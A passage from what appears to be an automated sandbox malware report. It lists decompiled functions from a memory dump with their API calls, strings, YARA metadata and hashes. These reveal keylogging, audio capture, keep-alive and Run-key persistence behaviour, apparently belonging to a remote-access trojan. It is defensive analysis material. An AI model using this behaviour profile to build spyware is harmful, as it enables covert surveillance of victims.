                                                                                                              • GetSystemMetrics.USER32(0000004E,?,?,?,?,?,004185D2,?,?), ref: 00418525
                                                                                                              • GetSystemMetrics.USER32(0000004F,?,?,?,?,?,004185D2,?,?), ref: 0041852B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MetricsSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 4116985748-0
                                                                                                              • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                              • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                              • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                              • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                              Function 0041B37D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B3D3
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B3DB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleOpenProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 39102293-0
                                                                                                              • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                                              • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                              • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                                              • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                              Function 00441EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorHandling__start
                                                                                                              • String ID: pow
                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                              • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                              • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                                              • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                              • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                                              Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountEventTick
                                                                                                              • String ID: >G
                                                                                                              • API String ID: 180926312-1296849874
                                                                                                              • Opcode ID: 8970c785a5fde0425d3bdd382a7839f198ae3ee3428ffa10454bc42c3a0da609
                                                                                                              • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                              • Opcode Fuzzy Hash: 8970c785a5fde0425d3bdd382a7839f198ae3ee3428ffa10454bc42c3a0da609
                                                                                                              • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                              Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ACP$OCP
                                                                                                              • API String ID: 0-711371036
                                                                                                              • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                              • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                              • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                              • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                              Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                              Strings
                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocalTime
                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                              • API String ID: 481472006-1507639952
                                                                                                              • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                                                                              • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                              • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                                                                              • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                              Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocalTime
                                                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                                                              • API String ID: 481472006-2430845779
                                                                                                              • Opcode ID: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                                                                              • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                              • Opcode Fuzzy Hash: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                                                                              • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                              Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExistsFilePath
                                                                                                              • String ID: alarm.wav$xIG
                                                                                                              • API String ID: 1174141254-4080756945
                                                                                                              • Opcode ID: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                                                                              • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                              • Opcode Fuzzy Hash: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                                                                              • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                              Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                              • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                              • String ID: Online Keylogger Stopped
                                                                                                              • API String ID: 1623830855-1496645233
                                                                                                              • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                                                                              • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                              • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                                                                              • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                              Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401747
                                                                                                              • waveInAddBuffer.WINMM(?,00000020), ref: 0040175D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wave$BufferHeaderPrepare
                                                                                                              • String ID: T=G
                                                                                                              • API String ID: 2315374483-379896819
                                                                                                              • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                              • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                              • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                              • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                              Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocaleValid
                                                                                                              • String ID: IsValidLocaleName$j=D
                                                                                                              • API String ID: 1901932003-3128777819
                                                                                                              • Opcode ID: 700326c1a2573b6664808296cb94fd2409df718d2f56e2bd6c09d2c4f197ce31
                                                                                                              • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                              • Opcode Fuzzy Hash: 700326c1a2573b6664808296cb94fd2409df718d2f56e2bd6c09d2c4f197ce31
                                                                                                              • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                              Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID: T=G$T=G
                                                                                                              • API String ID: 3519838083-3732185208
                                                                                                              • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                              • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                              • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                              • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                              Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                • Part of subcall function 00409B10: GetKeyboardLayout.USER32 ref: 00409B52
                                                                                                                • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32 ref: 00409B8A
                                                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32 ref: 00409BE3
                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                              • String ID: [AltL]$[AltR]
                                                                                                              • API String ID: 2738857842-2658077756
                                                                                                              • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                                                                              • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                              • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                                                                              • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                              Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 00448825
                                                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFreeHeapLast_free
                                                                                                              • String ID: `@$`@
                                                                                                              • API String ID: 1353095263-20545824
                                                                                                              • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                              • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                              • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                              • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                              Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: State
                                                                                                              • String ID: [CtrlL]$[CtrlR]
                                                                                                              • API String ID: 1649606143-2446555240
                                                                                                              • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                                                              • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                              • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                                                              • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                              Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteOpenValue
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                              • API String ID: 2654517830-1051519024
                                                                                                              • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                              • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                              • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                              • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                              Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                              • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 1717984340-0
                                                                                                              • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                              • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                              • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                              • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759